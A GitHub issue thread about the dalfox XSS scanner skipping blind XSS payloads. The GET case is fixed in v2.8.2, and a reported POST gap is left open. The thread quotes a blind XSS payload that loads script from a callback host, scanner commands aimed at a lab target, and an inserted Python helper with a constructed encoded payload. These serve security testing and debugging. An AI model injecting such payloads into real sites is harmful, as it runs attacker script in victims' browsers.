hahwul / dalfox

🌙🦊 Dalfox is a powerful open-source XSS scanner and utility focused on automation.
https://dalfox.hahwul.com
MIT License

Dalfox Not Testing Blind XSS #409

Closed tekcap closed 1 year ago

tekcap commented 1 year ago

Running a very basic Blind XSS command against a hackthebox target and it doesn't look like Dalfox is even using the blind payload.

dalfox url "http://IP/hijacking/index.php?fullname=x&username=x&password=x&email=dsfs%40joe.com&imgurl=a" -b http://IP:8080 --skip-bav --debug --skip-mining-all -p imgurl -w 1

The imgurl parameter is vulnerable to this XSS payload: "><script src=http://IP:8080></script>

I'm assuming Dalfox will use that payload since it's a very basic one.

The debug shows this, but I'm not sure what it means:

[88/143 Queries][61.54%] Testing "imgurl" param and waiting headless
Sep 26 04:12:45.894 [DEBU] [toBlind] [vds] false
Sep 26 04:12:45.894 [DEBU] [toBlind] [vrs] false

Does the false mean that it's not attempting the blind payloads? All the other debug lines are showing me the payload that it is currently testing, but when the blind debug lines appear, they're empty, as shown above. I proxy everything through BURP and can confirm that it's not sending the blind payload.

hahwul commented 1 year ago

Hi @tekcap

What is the version of dalfox? First of all, the blind XSS payload is being sent well in my env. I need to know the exact situation, so please check it! (blind XSS is sent in various patterns in various sections such as parameters and headers.)

dalfox url https://xss-game.appspot.com/level1/frame\?z\=1 -b hahwul.xss.ht --proxy http://localhost:8090

[Screenshot 2022-09-27 12:32:30 AM]

hahwul commented 1 year ago

Oh, there's one thing I found out. Based on the current pkg, parameters other than reflected ones are not tested for blind XSS. I think this was the problem, let me check quickly!

tekcap commented 1 year ago

I'm on version v2.8.1, installed with the go command provided.

For some reason, the blind XSS doesn't even get sent in the URL parameter. I don't see the payload anywhere in BURP.

hahwul commented 1 year ago

@tekcap There was a bug in the parameter analysis and I just fixed it. Please update to v2.8.2 and check it! If it is reproduced in v2.8.2, please re-open it. Thank you very much :D

How to update DalFox

Test

Param Analysis (test with --report flag)

Old: [Screenshot 2022-09-27 12:54:41 AM]

New: [Screenshot 2022-09-27 12:55:03 AM]

Blind XSS Test

./dalfox version
# v2.8.2

./dalfox url https://xss-game.appspot.com/level1/frame\?z\=1 \
      -b hahwul.xss.ht \
      --proxy http://localhost:8090

[Screenshot 2022-09-27 12:57:10 AM]

tekcap commented 1 year ago

I just realized this issue still persists when using "file --rawdata" with a post request.

I think you fixed it for GET, but not POST.

I see the Referrer header is working with the blind payload, but not the parameters.
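The check tekcap did by hand in Burp, as an added example that is not part of the issue or of dalfox's own code: given proxied requests, report in which locations (query string, POST body, headers) the blind-callback host appears, so that a missing `body:imgurl` makes the POST gap visible. The request dicts and the captured samples below are constructed; the callback host reuses the one shown in the thread.

```python
from urllib.parse import urlsplit, parse_qs

# Callback host from the thread's example command; any unique marker works.
CALLBACK_HOST = "hahwul.xss.ht"


def locations_with_marker(request, marker=CALLBACK_HOST):
    """Return labels like 'query:imgurl', 'body:username', 'header:Referer'
    for every place in one captured request where the marker occurs.
    request is a constructed dict: {'method', 'url', 'headers', 'body'}."""
    hits = set()
    query = urlsplit(request["url"]).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if any(marker in v for v in values):
            hits.add(f"query:{name}")
    # Only form-encoded bodies are parsed here; JSON bodies would need a second branch.
    for name, values in parse_qs(request.get("body") or "", keep_blank_values=True).items():
        if any(marker in v for v in values):
            hits.add(f"body:{name}")
    for name, value in request.get("headers", {}).items():
        if marker in value:
            hits.add(f"header:{name}")
    return hits


def coverage_report(requests, expected_params, marker=CALLBACK_HOST):
    """Merge hits across a whole capture and list expected parameter
    locations (e.g. 'body:imgurl') that never carried the marker."""
    seen = set()
    for req in requests:
        seen |= locations_with_marker(req, marker)
    missing = {p for p in expected_params if p not in seen}
    return seen, missing


# Constructed captures: one GET where the payload landed in the parameter,
# one POST where only the Referer header carried it (the behaviour reported above).
GET_CAPTURE = {
    "method": "GET",
    "url": "http://target.example/hijacking/index.php?fullname=x&imgurl="
           "%22%3E%3Cscript%20src%3Dhttp%3A%2F%2Fhahwul.xss.ht%3E%3C%2Fscript%3E",
    "headers": {"Host": "target.example"},
    "body": "",
}
POST_CAPTURE = {
    "method": "POST",
    "url": "http://target.example/hijacking/index.php",
    "headers": {"Host": "target.example", "Referer": "http://hahwul.xss.ht/"},
    "body": "fullname=x&username=x&imgurl=a",
}
```

Run `coverage_report([GET_CAPTURE, POST_CAPTURE], {"query:imgurl", "body:imgurl"})` over a real proxy export to see which injection points the scanner actually exercised.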

hahwul commented 1 year ago

@tekcap Thank you for the report! Let me check again :D

anasbousselham commented 11 months ago

Blind Payload Not Working in POST